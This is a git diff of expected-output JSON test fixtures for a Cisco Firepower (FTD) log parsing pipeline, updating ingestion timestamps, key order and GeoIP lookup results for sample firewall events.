-2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305802800Z", + "ingested": "2021-12-14T14:37:47.267669186Z", "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305808200Z", + "ingested": "2021-12-14T14:37:47.267669578Z", "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305813500Z", + "ingested": "2021-12-14T14:37:47.267669908Z", "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305818800Z", + "ingested": "2021-12-14T14:37:47.267670249Z", "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305824200Z", + "ingested": "2021-12-14T14:37:47.267670582Z", "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305829800Z", + "ingested": "2021-12-14T14:37:47.267671031Z", "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305835200Z", + "ingested": "2021-12-14T14:37:47.267674656Z", "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305840600Z", + "ingested": "2021-12-14T14:37:47.267675270Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305847900Z", + "ingested": "2021-12-14T14:37:47.267675753Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305853500Z", + "ingested": "2021-12-14T14:37:47.267676279Z", "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2792,7 +2792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305858800Z", + "ingested": "2021-12-14T14:37:47.267676622Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2871,7 +2871,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305864200Z", + "ingested": "2021-12-14T14:37:47.267676967Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2948,7 +2948,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305869500Z", + "ingested": "2021-12-14T14:37:47.267677314Z", "original": "Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3026,7 +3026,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305874900Z", + "ingested": "2021-12-14T14:37:47.267677640Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3106,7 +3106,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305880300Z", + "ingested": "2021-12-14T14:37:47.267677972Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3188,7 +3188,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305885600Z", + "ingested": "2021-12-14T14:37:47.267678304Z", "original": "Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3269,7 +3269,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305890900Z", + "ingested": "2021-12-14T14:37:47.267678641Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3350,7 +3350,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305896300Z", + "ingested": "2021-12-14T14:37:47.267678977Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3423,7 +3423,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305901700Z", + "ingested": "2021-12-14T14:37:47.267679314Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3493,7 +3493,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305907100Z", + "ingested": "2021-12-14T14:37:47.267679646Z", "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3568,7 +3568,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305912500Z", + "ingested": "2021-12-14T14:37:47.267679976Z", "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3646,7 +3646,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305918Z", + "ingested": "2021-12-14T14:37:47.267680428Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3726,7 +3726,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305923400Z", + "ingested": "2021-12-14T14:37:47.267680762Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3808,7 +3808,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:04.305928800Z", + "ingested": "2021-12-14T14:37:47.267681105Z", "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:33:04.305934100Z", + "ingested": "2021-12-14T14:37:47.267681428Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3948,7 +3948,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305939400Z", + "ingested": "2021-12-14T14:37:47.267681774Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4012,7 +4012,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305944700Z", + "ingested": "2021-12-14T14:37:47.267682101Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4076,7 +4076,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305950Z", + "ingested": "2021-12-14T14:37:47.267682433Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4140,7 +4140,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305955300Z", + "ingested": "2021-12-14T14:37:47.267682759Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4204,7 +4204,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305960800Z", + "ingested": "2021-12-14T14:37:47.267683158Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4268,7 +4268,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305966100Z", + "ingested": "2021-12-14T14:37:47.267683489Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305971500Z", + "ingested": "2021-12-14T14:37:47.267683817Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305976800Z", + "ingested": "2021-12-14T14:37:47.267684153Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4471,7 +4471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306013300Z", + "ingested": "2021-12-14T14:37:47.267684509Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:04.306019700Z", + "ingested": "2021-12-14T14:37:47.267684842Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306025100Z", + "ingested": "2021-12-14T14:37:47.267685183Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4680,7 +4680,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306030500Z", + "ingested": "2021-12-14T14:37:47.267685515Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4762,7 +4762,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306039700Z", + "ingested": "2021-12-14T14:37:47.267685841Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4844,7 +4844,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.306045100Z", + "ingested": "2021-12-14T14:37:47.267686176Z", "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4908,7 +4908,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306050700Z", + "ingested": "2021-12-14T14:37:47.267686504Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4964,7 +4964,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306056Z", + "ingested": "2021-12-14T14:37:47.267686830Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +5026,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.306061300Z", + "ingested": "2021-12-14T14:37:47.267687164Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json index 52f31f7087c..9252476ce27 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json @@ -16,15 +16,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -62,7 +62,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624161600Z", + "ingested": "2021-12-14T14:37:55.820193450Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -131,15 +131,15 @@ "packets": 1, "ip": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "icmp", "transport": "icmp", "application": "icmp client", "iana_number": "1" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624169900Z", + "ingested": "2021-12-14T14:37:55.820196341Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -238,37 +238,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "eu-central-1.ec2.archive.ubuntu.com", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "81.2.69.144", - "packets": 0 + "packets": 0, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "eu-central-1.ec2.archive.ubuntu.com", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -277,15 +271,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -323,7 +317,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624175500Z", + "ingested": "2021-12-14T14:37:55.820196817Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -382,37 +376,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "siem-inside", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "81.2.69.144", - "packets": 2 + "packets": 2, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "siem-inside", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -421,15 +409,15 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -468,7 +456,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624180900Z", + "ingested": "2021-12-14T14:37:55.820197194Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", @@ -535,27 +523,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -564,13 +546,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -608,7 +590,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624186200Z", + "ingested": "2021-12-14T14:37:55.820197552Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -666,27 +648,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "81.2.69.144", - "packets": 29001 + "packets": 29001, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -702,9 +678,6 @@ "scheme": "http", "domain": "eu-central-1.ec2.archive.ubuntu.com" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", @@ -714,6 +687,9 @@ ], "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -757,7 +733,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-09T13:33:12.624191600Z", + "ingested": "2021-12-14T14:37:55.820197905Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", @@ -829,27 +805,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -858,13 +828,13 @@ "packets": 2, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -902,7 +872,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:12.624240600Z", + "ingested": "2021-12-14T14:37:55.820198293Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -960,27 +930,21 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -996,15 +960,15 @@ "scheme": "http", "domain": "www.eicar.org" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1048,7 +1012,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:33:12.624248Z", + "ingested": "2021-12-14T14:37:55.820198663Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, 